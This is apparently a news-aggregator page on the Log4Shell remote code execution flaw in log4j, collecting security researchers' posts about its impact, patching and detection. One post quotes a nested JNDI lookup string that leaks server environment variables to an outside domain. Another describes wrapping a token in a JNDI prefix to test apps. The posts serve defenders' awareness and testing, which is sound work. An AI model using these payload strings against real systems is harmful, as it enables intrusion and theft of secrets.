TEXXR

Chronicles

The story behind the story


A vulnerability in the Apache log4j Java logging library allows for remote code execution, impacting Steam, iCloud, Minecraft, and other services

A few hours ago, a 0-day exploit in the popular Java logging library, log4j, was tweeted along with a POC posted on GitHub that results …

LunaSec Blog

Discussion

  • reddit reddit on reddit
    RCE 0-day exploit found in log4j, a popular Java logging package
  • @_staticflow_ Tanner Barnes on x
    In case anyone hasn't discovered this. The Log4J formatting is nestable which means payloads like ${jndi:ldap://${env:user}.xyz.collab.co m/ a} Will leak server side env vars!
  • @yazicivo @yazicivo on x
    Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for, for a feature we all dislike yet needed to keep due to backward compatibility concerns. htt…
  • @malwaretechblog Marcus Hutchins on x
    This log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam, and Minecraft have all been confirmed vulnerable.
  • @nsa_csdirector Rob Joyce on x
    The log4j vulnerability is a significant threat for exploitation due to the widespread inclusion in software frameworks, even NSA's GHIDRA. This is a case study in why the software bill of material (SBOM) concepts are so important to understand exposure. https://arstechnica.com/.…
  • @secbro1 SecBro on x
    https://twitter.com/...
  • @kikta @kikta on x
    Gonna be one of those weekends https://twitter.com/...
  • @cyb3rops @cyb3rops on x
    How to test your apps for #log4shell vulnerability 1. Generate a DNS token https://canarytokens.org/... 2. Wrap that token in Prefix: ${jndi:ldap:// Suffix: /a} 3. Use that value in search forms, profile data, settings etc. of your apps 4. Get notified when you triggered a reacti…
  • @tarah Tarah M. Wheeler on x
    Months from now, I don't want to hear that a major consumer financial institution failed to patch this five alarm CVE Apache vulnerability. I'm tired of opening emails that start with “we take your privacy and security very seriously.” https://twitter.com/...
  • @certnz Cert Nz on x
    CERT NZ has released an advisory on a Java vulnerability. Reports from online users show that this is being actively exploited and that proof-of-concept code has been published. https://www.cert.govt.nz/...
  • @weldpond Chris Wysopal on x
    The patched version of log4j 2.15.0 requires a minimum of Java 8. If you are on Java 7 you will need to upgrade to Java 8. When there is active exploitation and you need to patch fast it is beneficial if you have been updating your other dependencies over time.
  • @campuscodi Catalin Cimpanu on x
    I have a feeling I'll be doing follow-up breach stories related to that log4j bug 'til Easter
  • @eastdakota @eastdakota on x
    Patch your systems. #Log4J is being actively exploited. https://twitter.com/...
  • @erratarob @erratarob on x
    🚨🚨🚨🚨 🚨🚨🚨🚨 🚨🚨🚨🚨 If there were an Internet threat level where your organization needs to panic, this is it. Your org needs to deal with the log4j problem. 🚨🚨🚨🚨 🚨🚨🚨🚨 🚨🚨🚨🚨
  • @briannawu Brianna Wu on x
    Not sure why a logging app needs code execution. In either case, this is extremely serious. Thinking of all my infosec friends who will be working all weekend. https://twitter.com/...
  • @uscert_gov Us-Cert on x
    Upgrade ASAP to protect yourself from the #RCE vulnerability, CVE-2021-44228, affecting Apache Log4j. Read more at https://www.cisa.gov/... #ZeroDay #Cybersecurity #InfoSec
  • @erratarob @erratarob on x
    Step #1: get a list of all your products exposed to the Internet that use Java. Step #2: call support for each and every one and ask the vendor. Vendors who don't have a canned answer are bad vendors who should not be trusted in the future. https://twitter.com/...
  • @eastdakota @eastdakota on x
    The #Log4J vulnerability is the worst Internet-wide vulnerability since #Shellshock. @Cloudflare has updated our WAF and Zero Trust solutions to protect our customers. https://blog.cloudflare.com/...
  • @tgockel Travis Gockel on x
    Today's log4j vulnerability's root cause was described by @pwntester in 2016. https://www.blackhat.com/...
  • @eastdakota @eastdakota on x
    We often talk about computer viruses. One interesting thing about #Log4J is that exploits may act more like a spore. So many different systems pass logs between them. The exploit string may act like a spore, laying dormant until it encounters a vulnerable log system.
  • @gossithedog Kevin Beaumont on x
    Targeting for Log4Shell so far seen in wild - password reset/forgot password forms, and search forms. I'm guessing orgs log and process searches and usernames in forgot password flows.
  • @_noid_ @_noid_ on x
    @kikta The amount of people saying “We use it, but those systems aren't directly accessible from the Internet” is just killing me.
  • @gossithedog Kevin Beaumont on x
    My number one take away for defenders right now is: keep calm. It's an evolving situation. No easy fix. Defence in depth is best defence: eg if you don't allow unrestricted outbound internet from webapps, you're in a good place as you need outbound traffic to exploit.
  • @swiftonsecurity @swiftonsecurity on x
    Putin thinking about all the US agencies he's gonna hack with Log4j https://twitter.com/...
  • @malwarejake Jake Williams on x
    Nothing says “brace for impact” on a vulnerability like coin miners being deployed. This is bottom feeder activity, consider it like a low water mark. https://twitter.com/...
  • @jacobian @jacobian on x
    📢 Folks, an extraordinarily bad RCE in log4j dropped today. If you use a JVM, your code or a dep probably uses log4j; you're vulnerable if you log user-supplied data. I know it's late but this one's bad enough it's worth starting your IR process now, or first thing tmrw. [1/2]
  • @hackinglz Justin on x
    @kikta This will take us well into January “hey do you have a software/server inventory??...sure!” “including all the dependencies??” ☠️
  • @randoriattack @randoriattack on x
    The Randori Attack Team can confirm exploitability of VMWare products in live environments (VMSA-2021-0028) via Log4j (CVE-2021-44228) aka “Log4Shell”. This is a critical vulnerability. Follow @RandoriAttack for updates: https://www.randori.com/... 1/3
  • @sans_isc Sans Isc on x
    Apache #log4j2 exploitation in full swing. PATCH NOW!! CVE-2021-44228 . 200+ exploit attempts against our honeypot so far from approx 100 sources. “bingsearchlib[.]com:39356” is particularly popular #log4j #cve202144228 #rce #0day #PATCHNOW https://twitter.com/...
  • @invalidname Chris Adamson on x
    BTW, peeps on Apple platforms, the Log4j security hole should be your reminder that if you conform to NSCoding, you really should also conform to NSSecureCoding. • https://developer.apple.com/... • https://nshipster.com/... https://twitter.com/...
  • @c_c_krebs Chris Krebs on x
    This one is pretty brutal based on the much smarter people I'm hearing from. Log4j is everywhere, it's trivial to exploit, & can be daisy chained thru services. The good news is Apache got a fix out fast and IT/IR teams are more & more primed for these events. The race is on... h…
  • @cybernigma @cybernigma on x
    It looks like facebook messenger (web) is vulnerable. I also got a hit through google's messages for web (SMS pairing). #log4j
  • @lunasecio LunaSec on x
    We added information about how you can test if you're vulnerable to our blog post on #Log4Shell. If you have found a better way, please let us know! https://www.lunasec.io/...
  • @gossithedog Kevin Beaumont on x
    If you already upgraded code to use just released log4j-2.15.0-rc1, it's still vulnerable - you now need to apply log4j-2.15.0-rc2 as there was a bypass. There is no stable release which fixes yet.
  • @gossithedog Kevin Beaumont on x
    There's some other pivots on this - even if you only do a DNS lookup, you can lookup, er, stuff. https://twitter.com/...
  • @getajobmike Mike Perham on x
    This log4j RCE is a great example of how software complexity can cause very bad unintended consequences. Literally every Java project in the world uses log4j. https://www.lunasec.io/...
  • @gossithedog Kevin Beaumont on x
    Starting a new thread for log4j security vulnerability and fallout. Spoiler: although this emerged as a Minecraft issue (lol) there is going to be impacts across a wide range of enterprise software for some time. https://twitter.com/...
  • @malwarebytes @malwarebytes on x
    A few hours ago, a 0-day RCE exploit was discovered in the logging library log4j. You may not have heard of it, but it's everywhere. Per @LunaSecIO: “Many, many services are vulnerable”. They include Steam, Apple iCloud, Minecraft, and others. https://www.lunasec.io/...
  • @badlionclient Badlion Client on x
    We have released a special patch today on Badlion Client across all Minecraft versions to fix an exploit recently discovered due to a 3rd party library. We will always make sure our users are safe! 🦁 For more details about this exploit see here: https://www.lunasec.io/...
  • @gossithedog Kevin Beaumont on x
    In English explainer about why Log4Shell is a big vulnerability: It's like if you locked the doors to your car, but then allowed anybody to shout commands at Siri from outside the car to remotely drive it. Log4j is buried deep inside products and orgs, gonna be painful to fix.
  • @gossithedog Kevin Beaumont on x
    Me in 2049, talking to the 18 year old entering cyber: ‘back in my day, somebody made a Minecraft video game command you type in chat, which ended up screwed up all the security controls that existed. Yes, we sucked’.
  • @reybango Rey Bango on x
    URGENT: if you're using log4j in your applications for logging, you need to update it. There's a remote code execution bug in it. GitHub labeled the vulnerability as “critical severity” https://www.vice.com/... via @vice
  • @campuscodi Catalin Cimpanu on x
    The Log4j zero-day (tracked as CVE-2021-44228, or #Log4Shell) has received an official security fix just as scans for vulnerable systems are ramping up https://therecord.media/... https://twitter.com/...
  • @campuscodi Catalin Cimpanu on x
    Let me save you a bunch of clicks: PoC: https://github.com/... Patch: https://logging.apache.org/... Technical breakdown: https://www.lunasec.io/... Systems confirmed vulnerable: https://github.com/... https://twitter.com/...
  • @jasonbcox0 Jason Cox on x
    0-day RCE vulnerability in log4j is getting exploited all over the place today. Fortunately a small config change can protect you. If you have a Java stack, stop what you're doing and read this ASAP! https://twitter.com/...
  • @uuallan @uuallan on x
    Happy Patch Friday. This is remotely executable and is being scanned for/presumably exploited in wild. You know the drill... https://twitter.com/...